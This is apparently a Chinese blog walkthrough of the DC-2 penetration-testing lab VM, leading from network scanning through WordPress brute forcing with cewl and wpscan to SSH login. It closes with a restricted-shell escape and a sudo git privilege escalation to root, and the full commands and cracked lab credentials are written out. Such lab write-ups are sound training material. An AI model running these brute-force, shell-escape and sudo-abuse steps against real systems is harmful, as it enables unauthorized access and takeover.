渗透测试靶机:DC-2

一、开始渗透

1.1 获取一下靶机ip

nmap -sn 192.168.2.1/24

title

1.2 扫描靶机端口和服务

nmap -sV -sC -A -p- 192.168.2.196

title
目标计算机开放80端口、7744端口

1.3 漏洞利用

1.3.1 先去访问一下80端口的网页,看看有些什么

如果访问不了,可以去host文件那里修改一下本地解析

vim /etc/hosts

title
打开网页就能直接看到flag1
它提示我要用下cewl工具

1.3.2 flag2

cewl http://dc-2 -w passwd.txt

继续搜集点信息

whatweb http://dc-2
dirb http://dc-2

title
title
很明显有个wp-admin的登陆网页
title
了解到有一个专门针对wordpress的工具wpscan
得到了三个用户admin、jerry、tom

wpscan --url http://dc-2 --enumerate u  //枚举用户
wpscan --url http://dc-2 --passwords passwd.txt

title
先前cewl有生成字典,使用wpscan进行暴力破解
title
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆
jerry / adipiscing
tom / parturient
用jerry登陆进去后直接就找到了flag2
title

1.3.3 flag3

还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去
jerry没有成功,但tom可以

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

不能用cat打开

compgen -c  //列出当前可执行命令 有个less
less flag3.txt

title

1.3.4 flag4

发现ls能列出home目录,然后还能直接用less查看flag4.txt

tom@DC-2:~$ ls /home
jerry  tom
tom@DC-2:~$ ls /home/jerry
flag4.txt
tom@DC-2:~$ less /home/jerry/flag4.txt

title

1.3.5

尝试绕过rbash(这里直接借鉴了别人的,但还是不太懂)

:set shell=/bin/sh
:shell
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
find / -perm -u=s -type f 2>/dev/null

title

$ su jerry
Password:adipiscing 
jerry@DC-2:/tmp$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

git是以root权限执行的,git也照应了上一个flag的提示

sudo git help config
!/bin/bash

然后回来就变成了root
title
后面的步骤做的有些云里雾里的。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值